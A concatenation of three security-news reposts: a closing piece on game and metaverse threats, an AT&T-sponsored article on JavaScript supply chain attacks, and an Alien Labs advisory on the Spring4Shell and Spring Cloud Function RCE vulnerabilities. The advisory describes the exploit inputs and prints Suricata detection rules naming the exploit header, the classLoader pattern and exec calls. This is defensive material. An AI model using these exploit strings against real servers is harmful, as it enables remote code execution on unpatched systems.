In July, NintendoLife highlighted one particularly notorious hack of the Legend of Zelda series that was sold, unlawfully, and earned the creator over $87,000 in revenue. This exploit showed a common route towards tricking customers – deception. Zelda has a notably strong community where fans help each other out, both in learning the game and defending against common exploits; this is why the malicious actor in question was discovered, and why no further harm was done, but it remains a risk. Awareness is often key in avoiding attempted cyber attacks.

Web services to apps

Video games have become increasingly merged with web services and this, too, is raising the risk of attack. According to CISO mag, a majority of the attacks targeting video game services were conducted via SQL injection, a popular form of web service attack that attempts to breach databases. This, in turn, can result in the extraction of private customer details and financial information.

Games have previously sought to use their own platforms for registration and payments. However, in recent years, and especially with the growth of gaming platforms – such as Battle.net, Steam and EA Origin – user account details are made more vulnerable through their hosting via web services. This is a worrying development when considering the ultimate interface of video gaming, web services, and virtual reality – the up-and-coming Metaverse.

The Metaverse

The Metaverse is a descriptor for an interlinked series of digital worlds that will come together into one VR-powered reality. Pioneered most recently by Mark Zuckerberg and his Meta company, it is considered the future of communication and casual video gaming. According to Hacker Noon, the Metaverse is at unique risk of being subjected to serious cyber attacks.

The Metaverse is unique in that it will require digital currencies to operate. It is envisioned as a world within a world – not simply a service you pay for and then access, but an area where you will actively live and play. That means persistent financial data and constant access to privileged private information. Furthermore, individuals play themselves in the Metaverse; not a created character. One successful attack could claim a significant amount of data from any single user of the Metaverse, making it the ideal target for a new generation of cyber attacks.

In short, the protections that will come up for the Metaverse need to be absolutely world-class. Collaboration is required, and a strong culture of individual diligence and digital hygiene, too. Putting these principles in place today will help to protect the Metaverse before it really gets big, and protect video gamers too.

The post Cyber threats increasingly target video games – The metaverse is next appeared first on Cybersecurity Insiders.

In open source we trust

JavaScript code—used in 98% of all global websites–is a notable contributor to the ongoing software supply chain attack problems. In fact, vulnerable or malicious JavaScript is likely responsible for a sizable portion of the increase in attacks during 2021. With much of the JavaScript code that drives websites originating from open-source libraries, organizations need to understand how open source contributes to the JavaScript supply chain issues, and what they need to do to protect their business and their customers.

What’s going on with the supply chain?

Often called one of the most insidious and dangerous forms of hacking, software supply chain attacks can devastate businesses. In addition to the immediate effects of an attack, such as operational delays, system infiltration, and the theft of sensitive credentials or customer data, the long-term consequences can be significant. Regulatory fines, compliance concerns, reputation damage, attacks on connected businesses, and lost customers are often the consequences of a supply chain attack.

Software supply chain attacks currently dominate the headlines, with recent industry research reporting a 300% increase in 2021. The research found that threat actors tend to focus on open source vulnerabilities and code integrity issues to deliver attacks. In addition, researchers discovered a low level of security across software development environments, with every company examined having vulnerabilities and misconfigurations.

Another industry report discovered a 650% increase over the course of one year in supply chain attacks aimed at upstream public repositories, the objective being to implant malware directly into open source projects to infiltrate the commercial supply chain.

A common thread in all of this is JavaScript—an inherently insecure coding language and one that is often found in open source projects.

Open-source JavaScript: A focal point for attack

Why the software supply chain has become a focal point for threat actors is a question on quite a few minds. The answer comes down to what is easy and most profitable. Software is imperfect. Vulnerabilities and flaws make it ripe for attack. And a connected supply chain ensures a large attack surface. Add to this is the prevalent use of the JavaScript programming language and open-source JavaScript libraries, which often contain flawed and sometimes malicious–third- or fourth-party code, and businesses become ground zero for JavaScript supply chain attacks.

JavaScript serves as one of the core technologies used to build web applications and websites. As mentioned previously, over 98% of websites use it for client-side web page behavioral elements. Additionally, 80% of websites use open-source or a third-party JavaScript library as part of their web application. The Stack Overflow 2021 Developer Survey found that JavaScript remains the most popular programming language with 65% of professional developers using it. Unfortunately, JavaScript wasn’t built with security in mind, making it extremely vulnerable to attack. JavaScript allows threat actors to deliver malicious scripts to run on both the front end and the back end of a system, affecting businesses, employees, and customers alike.

In addition, because there is little to no oversight in open-source libraries, vulnerabilities and malicious scripts can often lay unnoticed for months or even years.

The security firm WhiteSource recently highlighted the problems with open-source libraries and JavaScript, identifying more than 1,300 malicious packages in the most commonly downloaded JavaScript package repository.

What do JavaScript supply chain attacks look like?

As we mentioned earlier, JavaScript was not built with security in mind. Since there are no security permissions built into the JS framework, it is difficult to keep JavaScript code safe from attack. The most common JavaScript security vulnerabilities include:

  • Source code vulnerabilities
  • Input validation
  • Reliance on client-side validation
  • Unintended script execution
  • Session data exposure
  • Unintentional user activity

JavaScript supply chain attacks can take on one of three different forms: attacking the developer directly; embedding the attack on the back end; or embedding the attack on the front end.

Let’s play attack the developer!

The recent news of malicious activity found in npm, the most popular JavaScript package manager, made international headlines. These JavaScript package managers are designed to help developers automate any dependencies associated with a development project. Package managers enable automatic installation of new packages or an update to existing packages with a single command. They’re hugely popular, with new package managers released often, making them difficult to monitor. Since npm is open source, anyone can submit JavaScript packages, even bad actors who intentionally include malicious scripts in their packages.

The thing about package managers is that they install files directly on the developer’s machine, which means threat actors can get almost instant access to a developer’s device and possibly the entire system and network. According to WhiteSource, the organization that discovered the malicious npm packages, much of the malicious activity involved embedding malicious files on developer machines to engage in the ‘reconnaissance’ phase of an attack (based on the MITRE ATT&CK Framework), that is, active or passive information gathering. Researchers also discovered that 14% of the packages were designed to steal sensitive information, such as credentials.

Researchers found that threat actors designed these malicious packages to make them look legitimate, by using the names of well-known and popular npm packages, and then emulating source code. Malicious files observed in the study included obfuscated JavaScript and binaries hidden as JavaScript components.

The researchers in the WhiteSource study also found that in some instances, once the developers downloaded the files, one of the binaries would download a third-party file designed to interact with the Windows Registry to collect system and configuration information. The malicious file would also try to establish a connection with a remote host to enable remote code execution (RCE). The fake JavaScript files also included examples of Cobalt Strike, a tool used during Red Teams and penetration testing to facilitate an attack. According to researchers, the ultimate goal of this malicious software appeared to be cryptocurrency mining directly on the developer machine.

While threat actors did not appear to target specific industries or companies, they did design malicious packages to target certain systems. Researchers also discovered malicious JavaScript packages that used typosquatting, dependency confusion, code obfuscation, and other types of attack techniques.

Back-end JavaScript threats

JavaScript frameworks commonly used for server-side development, or the back end of a web application, are also highly susceptible to attack. As we mentioned earlier, JavaScript wasn’t built with security in mind making it an easy target. Any vulnerabilities in back-end JavaScript source code means threat actors have an easy way to infiltrate systems, install malicious files, and execute attacks. Risks include security misconfigurations, which can enable access to the back end; insecure back-end application design; vulnerable or outdated components; and server-side request forgery (SSRF). Examples of threats include SQL injection for back-end database manipulation, SSRF, and cross-site scripting (XSS).  

Front-end JavaScript threats

The front-end, or “client-side” code is executed within the browser which often lacks the same rigorous security controls that protect the back end of web applications. This makes vulnerable code on the client-side even more deadly due to the lack of visibility and control most organizations don’t have in place today. Since many web applications are written in JavaScript and operate on the client side, web users—such as bank or e-commerce customers—become vulnerable to attacks like Magecart, e-skimming, side loading, cross-site scripting (XSS), and formjacking.

Protect the complete attack surface with these three key steps

To fully manage the risk against breaches and attacks, companies must simultaneously protect both the client side and back end of their application portfolios. This includes anything accessed by the developer, anything written in JavaScript on the back end, and web assets that the customer can see (e.g., text and images) and interact with.

One of the most important actions ​​any business can take is protecting their customers from JavaScript threats. Unfortunately, because of the sophisticated and subtle nature of these attacks, they can be hard to detect until it’s too late. To ensure that businesses are offering a safe and secure digital experience, they must be diligent about securing their website and web applications from dangerous client-side JavaScript attacks.

To protect the client-side attack surface, businesses should apply these three best practices:

  • Review third-party code during software development: Third-party JavaScript is a great way to avoid the time and money associated with developing your own code, but third-party scripts can also contain vulnerabilities or intentional malicious content. Always inspect third- and fourth-party additions for vulnerabilities.
  • Perform automated client-side attack surface monitoring: Inspection activities are critical, but also time consuming if you don’t have an automated solution to review JavaScript code. A purpose-built solution, like Feroot’s Inspector offered in AT&T Managed Vulnerability Program’s Client-side Security Solution, that automates the process can be a fast and easy way to identify malicious script activity.
  • Identify software supply chain risks: Assess and know what third-party code is being used across your web application’s client-side.

Improve your JavaScript supply chain security

JavaScript carries risk. The only way to avoid your business and your customers becoming victims of a JavaScript attack is to apply JavaScript security best practices to your website and web application development process.

The services offered by AT&T’s Managed Vulnerability Program (MVP) allow the MVP team to inspect and monitor customer web applications for malicious JavaScript code that could jeopardize customer and organization security.

AT&T is helping customers strengthen their cybersecurity posture and increase their cyber resiliency by enabling organizations to align cyber risks to business goals, meet compliance and regulatory demands, achieve business outcomes, and be prepared to protect an ever-evolving IT ecosystem.

To learn more about JavaScript security, check out Feroot’s comprehensive Education Center to read more on terminologies, technologies, and threats.

The post JavaScript supply chain issues appeared first on Cybersecurity Insiders.

This blog was written jointly witEduardo Ocete.

Executive summary

Several vulnerabilities for Java Spring framework have been disclosed in the last hours and classified as similar as the vulnerability that caused the Log4Shell incident at the end of 2021. However, as of the publishing of this report, the still ongoing disclosures and events on these vulnerabilities suggest they are not as severe as their predecessor.

Key takeaways:

  • A vulnerability in Spring Cloud Function (CVE-2022-22963) allows adversaries to perform remote code execution (RCE) with only an HTTP request, and the vulnerability affects the majority of unpatched systems. Spring Cloud Function is a project that provides developers cloud-agnostic tools for microservice-based architecture, cloud-based native development, and more.
  • A vulnerability in Spring Core (CVE-2022-22965) also allows adversaries to perform RCE with a single HTTP request. For the leaked proof of concept (PoC) to work, the vulnerability requires the application to run on Tomcat as a WAR deployment which is not present in a default installation and lowers the number of vulnerable systems. However, the nature of the vulnerability is more general, so there could be other potential exploitable scenarios.

In accordance with the Cybersecurity Information Sharing Act of 2015, AT&T is sharing the cyber threat indicator information provided herein exclusively for a cybersecurity purpose to combat cybersecurity threats.

Analysis

At the end of March 2022, several members of the cybersecurity community were discovered spreading news about a potential new vulnerability in Java Spring systems that is easily exploitable and affecting millions of systems. This vulnerability has the potential to originate a new Log4Shell incident.

First, it is important to clarify that the comparisons at this point appear to be searching for sensationalism and spreading panic, instead of providing actionable information. Additionally, two similar vulnerabilities in the Spring framework were disclosed around the same time, adding confusion to the mix. What has been observed by the AT&T Alien Labs™ threat intelligence team as of the publishing of this article is included below.

Spring Cloud Function (CVE-2022-22963)

A vulnerability in Spring Cloud Function has been identified as CVE-2022-22963, and this vulnerability can lead to remote code execution (RCE). The following Spring Cloud Function versions are impacted:

  • 3.1.6
  • 3.2.2
  • Older unsupported versions are also affected

In addition to the vulnerable version, JDK >= 9 must be in use in order for the application to be vulnerable.

The vulnerability is triggered when using the routing functionality. By providing a specially crafted Spring Expression Language (SPeL) as a routing expression, an attacker can access local resources and execute commands in the host. Therefore, this CVE allows an HTTP request header, containing a spring.cloud.function.routing-expression object with a SPeL expression, to be evaluated through the StandardEvaluationContext, leading to an arbitrary RCE.

Java Spring exploitation

Figure 1. Exploitation attempt.

The vulnerability has been assigned a CVSS of 9.0 which means high severity. Exploitation of the vulnerability may lead to a total compromise of the host or the container, and so patching is highly advised. In order to mitigate the vulnerability developers should update Spring Cloud Function to the newest versions, 3.1.7 and 3.2.3, where the issue has already been patched.

AT&T Alien Labs has identified several attempts of exploitation, which we believe are researchers trying to identify how prevailing the vulnerabilities actually is, since the exploitation attempts carried canarytokens as unique payload. Nevertheless, the team will continue to closely monitor the activity, as new scanning activity appears.

Spring Core (CVE-2022-22965)

A vulnerability in Spring Core was tweeted by one of the researchers who first disclosed the Log4Shell vulnerability. The researcher then rapidly deleted the tweet. This vulnerability was originally published without a CVE associated with it, and it is being publicly referred to as “Spring4Shell.” One of the first observed proof of concepts (PoC) was shared by vx-underground on March 30, 2022. It works against Spring’s sample code “Handling Form Submission.” The PoC consists of a single POST request carrying in its payload a jsp webshell that will be dropped in the vulnerable system.

Spring core following PoC

Figure 2. Exploitation attempt following PoC.

Spring has confirmed the vulnerability and has stated that the leak occurred ahead of the CVE publication. The vulnerability has been assigned CVE-2022-22965. As per Spring:

“…The vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.”

From the statement above, the specific scenario for the leaked PoC to work would have to match the following conditions:

  • JDK >=9
  • Apache Tomcat as the Servlet container
  • Packaged as WAR
  • spring-webmvc or spring-webflux dependency

However, the scope of the vulnerability is wider, and there could be other exploitable scenarios.

Spring has released new versions for Spring Framework addressing the vulnerability, so updating to versions

5.3.18 and 5.2.20 (already available in Maven Central) should be a priority in order to mitigate the RCE. The new versions for Spring Boot with the patch for CVE-2022-22965 are still under development.

As an alternative mitigation, the suggested workaround is to extend RequestMappingHandlerAdapter to update the WebDataBinder at the end, after all other initialization. To do so, a Spring Boot application can declare a WebMvcRegistrations bean (Spring MVC) or a WebFluxRegistrations bean (Spring WebFlux). At the “Suggested Workarounds” section of the Spring statement one can find an implementation example of such workaround.

According to a publication by Peking University, this vulnerability has been observed being exploited in the wild. However, AT&T Alien Labs has not identified heavy scanning activity on our honeypots for this vulnerability, nor exploitation attempts.

Finally, and just to provide a graphical representation of these vulnerabilities, below is a diagram shared by a CTI researcher from Sophos.

Java Spring vulnerability diagram

Figure 3. Java Spring vulnerability diagram.

Conclusion

Log4Shell was very impactful at the end of 2021, based on the number of exposed vulnerable devices and the facility of its exploitation. These recently disclosed Java Spring vulnerabilities remind us in the cyber community of lessons learned during the Log4Shell incident. Thus, these vulnerabilities have received a quick response by the entire cybersecurity community which is collaborating and sharing available information as soon as possible.

Alien Labs will keep monitoring the situation and will update the corresponding OTX Pulses to keep our customers protected.

Appendix A. Detection methods

The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.

SURICATA IDS SIGNATURES

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”AV EXPLOIT Spring Cloud RCE (CVE-2022-22963)”; flow:established,to_server; content:”POST”; http_method; content:”spring.cloud.function.routing-expression”; http_header; pcre:”/(getRuntime|getByName|InetAddress|exec)/HR”; reference:url,sysdig.com/blog/cve-2022-22963-spring-cloud; classtype:attempted-admin; sid:4002725; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”AV INFO Spring Core RCE Scanning Activity (March 2022)”; flow:established,to_server; content:”POST”; http_method; content:”class.module.classLoader.resources.context.parent.pipeline.first.pattern”; http_client_body; startswith; reference:url,github.com/TheGejr/SpringShell; classtype:attempted-admin; sid:4002726; rev:1;)

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:”AV EXPLOIT Spring Cloud RCE (CVE-2022-22963)”; flow:established,to_server; content:”POST”; http_method; content:”spring.cloud.function.routing-expression”; http_header; pcre:”/(getRuntime|getByName|InetAddress|exec)/HR”; reference:url,sysdig.com/blog/cve-2022-22963-spring-cloud; classtype:attempted-admin; sid:4002727; rev:1;)

 

AGENT SIGNATURES

Java Process Spawning Scripting Process

Java Process Spawning WMIC

Java Process Spawning Scripting Process via Commandline (For Jenkins servers)

Suspicious process executed by Jenkins Groovy scripts (For Jenkins servers)

Suspicious command executed by a Java listening process (For Linux servers)

 

Appendix C. Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

  • TA0001: Initial Access
    • T1190: Exploit Public-Facing Application

Appendix D. Reporting context

The following source was used by the report author(s) during the collection and analysis process associated with this intelligence report.

1.      AT&T Alien Labs Intelligence and Telemetry

Alien Labs rates sources based on the Intelligence source and information reliability rating system to assess the reliability of the source and the assessed level of confidence we place on the information distributed. The following chart contains the range of possibilities, and the selection applied to this report is A1.

Source reliability

RATING

DESCRIPTION

A – Reliable

No doubt about the source's authenticity, trustworthiness, or competency. History of complete reliability.

B – Usually Reliable

Minor doubts. History of mostly valid information.

C – Fairly Reliable

Doubts. Provided valid information in the past.

D – Not Usually Reliable

Significant doubts. Provided valid information in the past.

E – Unreliable

Lacks authenticity, trustworthiness, and competency. History of invalid information.

F – Reliability Unknown

Insufficient information to evaluate reliability. May or may not be reliable.

 

Information reliability

RATING

DESCRIPTION

1 – Confirmed

Logical, consistent with other relevant information, confirmed by independent sources.

2 – Probably True

Logical, consistent with other relevant information, not confirmed.

3 – Possibly True

Reasonably logical, agrees with some relevant information, not confirmed.

4 – Doubtfully True

Not logical but possible, no other information on the subject, not confirmed.

5 – Improbable

Not logical, contradicted by other relevant information.

6 – Cannot be judged

The validity of the information can not be determined.

 

Feedback

AT&T Alien Labs welcomes feedback about the reported intelligence and delivery process. Please contact the Alien Labs report author or contact labs@alienvault.com.

The post Java Spring vulnerabilities appeared first on Cybersecurity Insiders.